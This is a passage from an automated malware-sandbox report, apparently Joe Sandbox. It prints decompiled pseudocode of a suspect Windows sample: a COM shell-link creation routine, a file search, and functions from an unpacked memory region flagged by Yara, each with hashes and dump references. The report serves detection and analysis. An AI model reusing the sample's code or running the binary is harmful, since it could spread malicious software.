				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E4D( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: b46a74587854a4a5a635a024edcd41f24a6e269412bb0254ad6851c745bb5835
Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
Opcode Fuzzy Hash: b46a74587854a4a5a635a024edcd41f24a6e269412bb0254ad6851c745bb5835
Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E0040644E( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406507();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 4712ae4617162a5ad1e1685ee19aa8be35db2a8aaa72db92bc2a724f02566d86
Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
Opcode Fuzzy Hash: 4712ae4617162a5ad1e1685ee19aa8be35db2a8aaa72db92bc2a724f02566d86
Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A

Uniqueness

Uniqueness Score: -1.00%

Function 033B12AA Relevance: 1.5, Strings: 1, Instructions: 273COMMON

Download Yara Rule

Strings

ire, xrefs: 033B167B

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ire
API String ID: 0-1284013946
Opcode ID: 648a8711969e6e27793877c76e62d05cc4c74e4a035b987ab24e29b7a3b1ccf7
Instruction ID: e45b8eb4c2a2934dacbcf37cd9087c06be9db40740fb6eddc87a5e604d098667
Opcode Fuzzy Hash: 648a8711969e6e27793877c76e62d05cc4c74e4a035b987ab24e29b7a3b1ccf7
Instruction Fuzzy Hash: A2A15971A0474A8FCB34CE28CDE53EA37B6EF95360F58826ACD598BB55D3308942CB51

Uniqueness

Uniqueness Score: -1.00%

Function 033B562F Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

yN, xrefs: 033B598B

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: yN
API String ID: 0-2685385224
Opcode ID: dd133c3160c9105ea85201dccf3708f43c981b03efce54837f8eeb212edab47c
Instruction ID: 4ac455e19a9abfad475acc26827b3acc59cc2bba069759e057c8406fd93de9f2
Opcode Fuzzy Hash: dd133c3160c9105ea85201dccf3708f43c981b03efce54837f8eeb212edab47c
Instruction Fuzzy Hash: AA914475604319CFDB35CE28C9D47DA37B2EF96350F58807EDD469BA06D77149468B00

Uniqueness

Uniqueness Score: -1.00%

Function 033B138C Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

ire, xrefs: 033B167B

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ire
API String ID: 0-1284013946
Opcode ID: 6e0f5da28550266aa78fbdbffd6e69245223c5f388cd68a6943ecd700ebd3fa3
Instruction ID: c5dc839b94292ed9b9ee0bfd67ed31913e5b7f69fa0ed0073a531cb3d0e26127
Opcode Fuzzy Hash: 6e0f5da28550266aa78fbdbffd6e69245223c5f388cd68a6943ecd700ebd3fa3
Instruction Fuzzy Hash: 9D916C719083DA8BCB31CE78CDA43DA3B72EF56360F1881AECC599BA46E3714542C711

Uniqueness

Uniqueness Score: -1.00%

Function 033B568A Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

yN, xrefs: 033B598B

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: yN
API String ID: 0-2685385224
Opcode ID: c54d86d0e0cf0f4504f06855386dfe98fb1ce72f79b6360b5d5a2ad3a5751ba6
Instruction ID: f36658ccf6fb480069bf217780e97206921ce7d1401526b6a1262c1c8fad3950
Opcode Fuzzy Hash: c54d86d0e0cf0f4504f06855386dfe98fb1ce72f79b6360b5d5a2ad3a5751ba6
Instruction Fuzzy Hash: EB911B715083AA8BDF36CEA8D8953D93B72AF57320F18816DDC49AF64BE3B10946C701

Uniqueness

Uniqueness Score: -1.00%

Function 033B1356 Relevance: 1.5, Strings: 1, Instructions: 209COMMON

Download Yara Rule

Strings

ire, xrefs: 033B167B

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ire
API String ID: 0-1284013946
Opcode ID: 15f0a97cb1bc7f9a32fc8cd1b9497b995683b93922341f272ab3e7493a406168
Instruction ID: 3730c6eec1b19368df6e70dc6c57e56a89ec0aaf4f60b9ed7fbec9fd635026e0
Opcode Fuzzy Hash: 15f0a97cb1bc7f9a32fc8cd1b9497b995683b93922341f272ab3e7493a406168
Instruction Fuzzy Hash: FC711B719083D78BCB35CEA8CDA93DE3B72AF56360F58826DCC599B64AE3B04542C711

Uniqueness

Uniqueness Score: -1.00%

Function 033B156E Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

ire, xrefs: 033B167B

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ire
API String ID: 0-1284013946
Opcode ID: 99bf9797320af89da6862c89d8c3fb6b3836e15e6aba52c41dc545911d575023
Instruction ID: 59230b1b13e68cad83dd9bf950137545589aa00dc231708ccdbe945958ad6bc6
Opcode Fuzzy Hash: 99bf9797320af89da6862c89d8c3fb6b3836e15e6aba52c41dc545911d575023
Instruction Fuzzy Hash: 80710D719083D68BCB35CEA8D9A93DD3B729F56370F59826DCC595B68AE3B04502C702

Uniqueness

Uniqueness Score: -1.00%

Function 033B14C3 Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

ire, xrefs: 033B167B

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ire
API String ID: 0-1284013946
Opcode ID: a4cb2d6c0e24cdf98b6e58e2fdb7a1b9bd4d021229a1efe3e8b5ba0b36c724e2
Instruction ID: dabc0111038e340679bbd8374d998157f92a4f43a1c0528dfbaf536dae7971a9
Opcode Fuzzy Hash: a4cb2d6c0e24cdf98b6e58e2fdb7a1b9bd4d021229a1efe3e8b5ba0b36c724e2
Instruction Fuzzy Hash: E4710B719083D74BCB35CEA8D9A93DD3B729F56370F58826DCC595B68AE3B04502C701

Uniqueness

Uniqueness Score: -1.00%

Function 033B573A Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

yN, xrefs: 033B598B

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: yN
API String ID: 0-2685385224
Opcode ID: 1347fc65df99b197eda5cc037df2e434baa8b3292dfd93bbdf48e1a7abc4a42f
Instruction ID: 58ce5691b725851938e919bef7b4fcd5c52ce5811d564826be873e97d63a9a58
Opcode Fuzzy Hash: 1347fc65df99b197eda5cc037df2e434baa8b3292dfd93bbdf48e1a7abc4a42f
Instruction Fuzzy Hash: CB715B715083AA8FDF328EB8D8993DA3B72AF57320F18817DDC45AF646E3B105468B01

Uniqueness

Uniqueness Score: -1.00%

Function 033B1412 Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

ire, xrefs: 033B167B

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ire
API String ID: 0-1284013946
Opcode ID: 06c94ab88d525b3a715e47160061304813a312b6d19d3df308a0360de6d5c3ea
Instruction ID: af907d7b074d635e14965ab19bdf9f2cfee6748c2c4226058438fd01f9ffb1e4
Opcode Fuzzy Hash: 06c94ab88d525b3a715e47160061304813a312b6d19d3df308a0360de6d5c3ea
Instruction Fuzzy Hash: 46710D71A083D68BCF35CEA8CD993DE3B72AF56360F59826DCC595B64AE3B04942C701

Uniqueness

Uniqueness Score: -1.00%

Function 033B175E Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

ire, xrefs: 033B167B

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ire
API String ID: 0-1284013946
Opcode ID: d9fc4bd3a0802592056d1612ba5f265753424ec2a2b8881666ad8bc392241e9e
Instruction ID: e29962d1200de7d65947715ff006a1def80d78c4da5242c88770187f42c5343e
Opcode Fuzzy Hash: d9fc4bd3a0802592056d1612ba5f265753424ec2a2b8881666ad8bc392241e9e
Instruction Fuzzy Hash: A6710D719043D68BCF35CEA8CD993DA3B72AF56360F58826DCC595B64AE3B14942C701

Uniqueness

Uniqueness Score: -1.00%

Function 033B1632 Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

ire, xrefs: 033B167B

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ire
API String ID: 0-1284013946
Opcode ID: 2abf81aad60b719a43cde5734fa2880c04b079a5474c91f3d2caf64390a0f13e
Instruction ID: 2f8a3753b52428f185e3a51f4d9d4e9b3c3777230b85c9695628a0662e44222d
Opcode Fuzzy Hash: 2abf81aad60b719a43cde5734fa2880c04b079a5474c91f3d2caf64390a0f13e
Instruction Fuzzy Hash: 89710D719043D68BCF35CEA8CD993DA3B72AF56360F58826DCD595B64AE3B04542C701

Uniqueness

Uniqueness Score: -1.00%

Function 033BE04B Relevance: 1.4, Strings: 1, Instructions: 183COMMON

Download Yara Rule

Strings

]DP, xrefs: 033BE1DA

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ]DP
API String ID: 0-2957338464
Opcode ID: b1645621a19e8aaca07271ecf0961791a1d168d89373e71bb70d4dccc65102d6
Instruction ID: dfc8b67dd32da81383acbdf159aed365f335102bed51a4db146a33706f0af39e
Opcode Fuzzy Hash: b1645621a19e8aaca07271ecf0961791a1d168d89373e71bb70d4dccc65102d6
Instruction Fuzzy Hash: 84613B715083C58ADF31DE389CD87DA7BB6AF52320F5982AACC9A4F58AD3350542C712

Uniqueness

Uniqueness Score: -1.00%

Function 033B57C6 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

yN, xrefs: 033B598B

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: yN
API String ID: 0-2685385224
Opcode ID: fb82a05774945c2793a48632ea9bd8622eb10fe3ac2afe9e87be8f816f24fe21
Instruction ID: 98c9a7c71803042d0a111ecc685d80f8af4ba6f766439e0321b24deca1728c4e
Opcode Fuzzy Hash: fb82a05774945c2793a48632ea9bd8622eb10fe3ac2afe9e87be8f816f24fe21
Instruction Fuzzy Hash: EA61F7715183AA9BDB328EF8E8993C93F72AF57320F18816DDC856B64BE3B105468701

Uniqueness

Uniqueness Score: -1.00%

Function 033B53CE Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

N\P, xrefs: 033B55CD

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: N\P
API String ID: 0-742318608
Opcode ID: 7f90135d96c711daafe39a7b3b5b47408f020d7a068287f4c98b2aab00ec3a93
Instruction ID: 51bc52f4dfef0b99612a2b953f394dc476956a416a22333bf8410355a5c2e5ae
Opcode Fuzzy Hash: 7f90135d96c711daafe39a7b3b5b47408f020d7a068287f4c98b2aab00ec3a93
Instruction Fuzzy Hash: 865100B1A00300CFDB28CF28CCD8BDAB7B5FF15350F85416AD98A8B661D77499818F51

Uniqueness

Uniqueness Score: -1.00%

Function 033B5876 Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

yN, xrefs: 033B598B

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: yN
API String ID: 0-2685385224
Opcode ID: d970a10669f6b1680d42495ce1e1f25a4e3fab1711e1b9c95864b3edd4aae1e6
Instruction ID: d127078df65191f495ea7f48a575786653a578e6dcaa0b4a3b9192106b271d99
Opcode Fuzzy Hash: d970a10669f6b1680d42495ce1e1f25a4e3fab1711e1b9c95864b3edd4aae1e6
Instruction Fuzzy Hash: 4751F0B54183A68BCB238EE4E4993C93F71AF17324F1885ADDC856B98BE3B104428B01

Uniqueness

Uniqueness Score: -1.00%

Function 033B591F Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

yN, xrefs: 033B598B

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: yN
API String ID: 0-2685385224
Opcode ID: 4738d335f950a8a10aa182b5608acbb103a95c925b2b09cd283ea4181aabb104
Instruction ID: 474a21b03d391d3be2d17d58fcc662c43a58b7eec6ac45c68d22f27506104873
Opcode Fuzzy Hash: 4738d335f950a8a10aa182b5608acbb103a95c925b2b09cd283ea4181aabb104
Instruction Fuzzy Hash: 5041C1B55083E69BCB338EF8E4593C93F71AF13334F58856D98556A98BE3B100478B02

Uniqueness

Uniqueness Score: -1.00%

Function 033B22FB Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

~1wd, xrefs: 033B22FB

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ~1wd
API String ID: 0-2779565412
Opcode ID: b3cf450152360c58a4e1be1d164229c3f870101cad836fbf551bfaca60b2a28c
Instruction ID: 07bb4d11c39a59c9015ff1d30a53707b167ab1c03d3a6517b996a3ed305e5d14
Opcode Fuzzy Hash: b3cf450152360c58a4e1be1d164229c3f870101cad836fbf551bfaca60b2a28c
Instruction Fuzzy Hash: E2216D3860974A4BDB38DD3D4FB43EB22F7AFA1390F59412E8C9BC7990D77540028505

Uniqueness

Uniqueness Score: -1.00%

Function 033B4EE7 Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c3bb3f1386efd231b247ec9fad7987ae98d14a6d38fef9cc25181266a5249ea
Instruction ID: 58e8d41fe8977c524fb15c63af406eceb14d4c44e307f1eae9256f625a05758d
Opcode Fuzzy Hash: 2c3bb3f1386efd231b247ec9fad7987ae98d14a6d38fef9cc25181266a5249ea
Instruction Fuzzy Hash: 38C1077241D2EA5BDB27CAF8A89D2DCBF719F43230F18999DD5C46F987E3A045028742

Uniqueness

Uniqueness Score: -1.00%

Function 033B2BBE Relevance: .3, Instructions: 260libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8E3D722A,?,033BCD41), ref: 033BC1CC

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8f40dfd2de845b488170b1052fa59252ff4ccc84c983227ac2b74da84aaa9d3f
Instruction ID: ce868c409677e8d0564ef0c05f46c0614ef2532f6066f4564360abd08c573d57
Opcode Fuzzy Hash: 8f40dfd2de845b488170b1052fa59252ff4ccc84c983227ac2b74da84aaa9d3f
Instruction Fuzzy Hash: 9F91587250838A9FCB348EA8DCA57EE7BB7AF82360F45851DD8C99B695E3704542C702

Uniqueness

Uniqueness Score: -1.00%

Function 033B50E8 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9a8b911b9fdd22167fa0860dadd0ef1c90b3eea4e99640c80e7d9addc0f209d
Instruction ID: f0029b3de0617aaeffd674954985cedbf7deb79bdae19a3b3a86277e1e76705f
Opcode Fuzzy Hash: a9a8b911b9fdd22167fa0860dadd0ef1c90b3eea4e99640c80e7d9addc0f209d
Instruction Fuzzy Hash: B161F87241D3EA5ADB27CAF8A85D2DCBF719E03230F089D9DD6C46EC87E2E040428746

Uniqueness

Uniqueness Score: -1.00%

Function 033B2CFE Relevance: .2, Instructions: 208libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8E3D722A,?,033BCD41), ref: 033BC1CC

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 20a92909fe4b1ef2701464a386bd784c8f918b7f08a4fdf1660df09ec78c13bb
Instruction ID: 4eafd9d428d9bfbbb1e1b99769aa48721901bc3b3c52a5cbccbc8b75c85dabe1
Opcode Fuzzy Hash: 20a92909fe4b1ef2701464a386bd784c8f918b7f08a4fdf1660df09ec78c13bb
Instruction Fuzzy Hash: F7719C7250838A9BCB35CEA8DCA57EE7B77AF82330F54811DDC899B686E3B05542C701

Uniqueness

Uniqueness Score: -1.00%

Function 033B2DFC Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da080bf0058f900d9a0905296d57faa07f338ec29b5c0a9eb2b335816e1103ff
Instruction ID: 13f2fc4c7d71407dbdc72c46ed10b8191234df8bd56481b3d17049ecfd90a1c4
Opcode Fuzzy Hash: da080bf0058f900d9a0905296d57faa07f338ec29b5c0a9eb2b335816e1103ff
Instruction Fuzzy Hash: 9F615A366443099FDB389E18CC917EB77B7BF92760F94452EDC9A8BA90D7309582CB01

Uniqueness

Uniqueness Score: -1.00%

Function 033B2D7E Relevance: .2, Instructions: 184libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8E3D722A,?,033BCD41), ref: 033BC1CC

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c81b9b447fb5db82b7e8915f5a581210d93344de297dcb7bd0ed2a4e12f12637
Instruction ID: d918255ea7275b27508d54185d16eecd76ec9cb8b7254204e1189f7480c08c1f
Opcode Fuzzy Hash: c81b9b447fb5db82b7e8915f5a581210d93344de297dcb7bd0ed2a4e12f12637
